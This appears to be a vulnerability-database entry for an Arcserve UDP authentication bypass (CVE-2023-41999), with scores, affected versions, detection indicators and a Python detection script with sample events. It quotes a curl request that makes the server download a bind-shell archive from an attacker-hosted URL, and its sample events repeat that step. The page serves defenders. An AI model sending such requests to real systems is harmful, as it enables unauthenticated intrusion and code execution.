CVE-2023-41999
Published 2023-11-27
Priority P269 · critical · CVSS 3.1 base score 9.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 1.44% (69.8th percentile)
An authentication bypass exists in Arcserve UDP prior to version 9.2. An unauthenticated, remote attacker can obtain a valid authentication identifier that allows them to authenticate to the management console and perform tasks that require authentication.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arcserve | arcserve_udp | < 9.2 | 9.2 |
| arcserve | udp | < 9.2 | 9.2 |
Detection & IOCs (extracted from sources)

Command quoted from the sources (a POST to the RPSService4CPMImpl endpoint on port 8014 delivering an attacker-hosted archive URL):

```bash
curl -ki -H 'Content-Type: text/xml' -d 'http://<attacker>:8000/download/shell_bind_tcp.zip' 'https://<target>:8014/RPSWebServiceImpl/services/RPSService4CPMImpl'
```

Note that the body as quoted is a bare URL rather than a SOAP envelope; read it as the shape of the request (endpoint, port, content type, attacker-hosted archive) rather than a drop-in request.
- Monitor for unauthenticated calls to ValidateUserByUUID() on the Arcserve UDP management console; this is the mechanism exploited to obtain a valid authentication UUID without credentials.
- Alert on access to the getEdgeAccount API by sessions that were not established through a credentialed login (i.e. sessions obtained via the bypass); it exposes administrative credentials, including encrypted passwords.
- Detect inbound requests to /RPSWebServiceImpl/services/RPSService4CPMImpl on port 8014 with Content-Type: text/xml from unauthenticated sources; these may indicate exploitation of the downloadAndInstallPatch() RCE vector (CVE-2023-41998, related context).
- Monitor for new file creation under \Engine\BIN\patch\ on Arcserve UDP hosts, especially ZIP or EXE files, which may indicate the downloadAndInstallPatch() routine was invoked.
- Watch for processes spawned as NT AUTHORITY\SYSTEM from the Arcserve Tomcat directory; this is indicative of successful RCE post-exploitation.

- The authentication bypass (CVE-2023-41999) relies on the UUID-based authentication mechanism (ValidateUserByUUID) being reachable by unauthenticated remote attackers; this is a design-level weakness in the management console's authentication flow.
- The vulnerability affects Arcserve UDP prior to version 9.2; patches are also available for UDP 7.0u2, 8.1, and 9.1 for customers unable to upgrade.
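The five indicators above written out as detection logic and run over constructed request and host events. This is an added example, not code from the page's sources or from Arcserve: the endpoint, port, operation names and the Engine\BIN\patch\ directory come from the indicators; the `credentialed` flag (assumed to be joined in by a SIEM from the console's login audit trail), the placeholder SOAP envelope, the install paths, and the assumption that the Tomcat process lives under a directory named `tomcat` are all assumptions made for the example.

```python
"""Detection logic for the Arcserve UDP indicators above, run over constructed events.

Added example; not code from the page's sources or from Arcserve. Endpoint, port,
operation names and the patch directory come from the indicators; everything else
is assumed.
"""
from __future__ import annotations
from dataclasses import dataclass

RPS_PATH = "/RPSWebServiceImpl/services/RPSService4CPMImpl"
RPS_PORT = 8014
PATCH_DIR_MARK = "\\engine\\bin\\patch\\"   # compared case-insensitively against the full path
TOMCAT_DIR_MARK = "\\tomcat\\"              # assumption: Arcserve's Tomcat sits under a "tomcat" directory
SYSTEM_USER = "nt authority\\system"

# SOAP operation names from the indicators; matched case-insensitively in the request body.
SOAP_OPS = {
    "validateuserbyuuid": "CVE-2023-41999: ValidateUserByUUID called without a credentialed session",
    "getedgeaccount": "getEdgeAccount called without a credentialed session (admin credential exposure)",
    "downloadandinstallpatch": "CVE-2023-41998 (related): downloadAndInstallPatch called without a credentialed session",
}


@dataclass
class HttpEvent:
    src: str
    dst_port: int
    path: str
    content_type: str
    body: str
    # Assumed to be joined in from the console's login audit trail: True only when the
    # session token on the request was issued by a username/password login.
    credentialed: bool


@dataclass
class HostEvent:
    kind: str               # "file_create" or "process_create"
    path: str               # created file, or image of the new process
    user: str = ""          # account the new process runs as
    parent_image: str = ""  # image of the parent process


def check_http(ev: HttpEvent) -> list[str]:
    """Network-side rules: the RPS endpoint rule plus the three operation-name rules."""
    if ev.credentialed:
        return []  # legitimate console session: nothing to raise
    alerts = []
    if (ev.dst_port == RPS_PORT and ev.path == RPS_PATH
            and "text/xml" in ev.content_type.lower()):
        alerts.append(f"{ev.src}: unauthenticated text/xml request to {RPS_PATH}:{RPS_PORT}")
    body = ev.body.lower()
    alerts.extend(f"{ev.src}: {msg}" for op, msg in SOAP_OPS.items() if op in body)
    return alerts


def check_host(ev: HostEvent) -> list[str]:
    """Host-side rules: archive/executable drops in the patch directory and SYSTEM children of Tomcat."""
    alerts = []
    path = ev.path.lower()
    if ev.kind == "file_create" and PATCH_DIR_MARK in path and path.endswith((".zip", ".exe")):
        alerts.append(f"new archive/executable under Engine\\BIN\\patch: {ev.path}")
    if (ev.kind == "process_create" and ev.user.lower() == SYSTEM_USER
            and TOMCAT_DIR_MARK in ev.parent_image.lower()):
        alerts.append(f"{ev.path} spawned as SYSTEM by {ev.parent_image}")
    return alerts


def run_detections(http_events, host_events) -> list[str]:
    alerts = []
    for ev in http_events:
        alerts.extend(check_http(ev))
    for ev in host_events:
        alerts.extend(check_host(ev))
    return alerts


# Constructed sample events. The SOAP envelope is a placeholder shape; only the operation
# names are taken from the indicators. The install paths are likewise made up.
ATTACKER = "198.51.100.7"
ENVELOPE = "<soap:Envelope><soap:Body>{}</soap:Body></soap:Envelope>"
SAMPLE_HTTP = [
    HttpEvent(ATTACKER, RPS_PORT, RPS_PATH, "text/xml",
              ENVELOPE.format("<ValidateUserByUUID/>"), credentialed=False),
    HttpEvent(ATTACKER, RPS_PORT, RPS_PATH, "text/xml",
              ENVELOPE.format("<getEdgeAccount/>"), credentialed=False),
    HttpEvent(ATTACKER, RPS_PORT, RPS_PATH, "text/xml",
              ENVELOPE.format(f"<downloadAndInstallPatch><url>http://{ATTACKER}:8000/download/shell_bind_tcp.zip</url></downloadAndInstallPatch>"),
              credentialed=False),
    HttpEvent("10.0.0.5", RPS_PORT, RPS_PATH, "text/xml",
              ENVELOPE.format("<getEdgeAccount/>"), credentialed=True),  # admin with a real login: no alert
]
UDP_ROOT = "C:\\Arcserve\\UDP"
SAMPLE_HOST = [
    HostEvent("file_create", UDP_ROOT + "\\Engine\\BIN\\patch\\shell_bind_tcp.zip"),
    HostEvent("file_create", UDP_ROOT + "\\Engine\\BIN\\patch\\notes.txt"),  # benign: not zip/exe
    HostEvent("process_create", UDP_ROOT + "\\Engine\\BIN\\patch\\shell_bind_tcp.exe",
              user="NT AUTHORITY\\SYSTEM",
              parent_image=UDP_ROOT + "\\Management\\TOMCAT\\bin\\java.exe"),
]

if __name__ == "__main__":
    for line in run_detections(SAMPLE_HTTP, SAMPLE_HOST):
        print("ALERT", line)
```

The `credentialed` flag is what separates a bypass session from a real one: the console itself will consider a UUID obtained through ValidateUserByUUID to be authenticated, so the rules have to be keyed on whether a username/password login was ever observed for that session, not on whether the request carried a token. The host-side rules are deliberately narrow (only ZIP/EXE drops in the patch directory, only SYSTEM processes whose parent is under the Tomcat directory) so that routine patch handling does not page anyone.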
No detection rules found.
No public exploits indexed.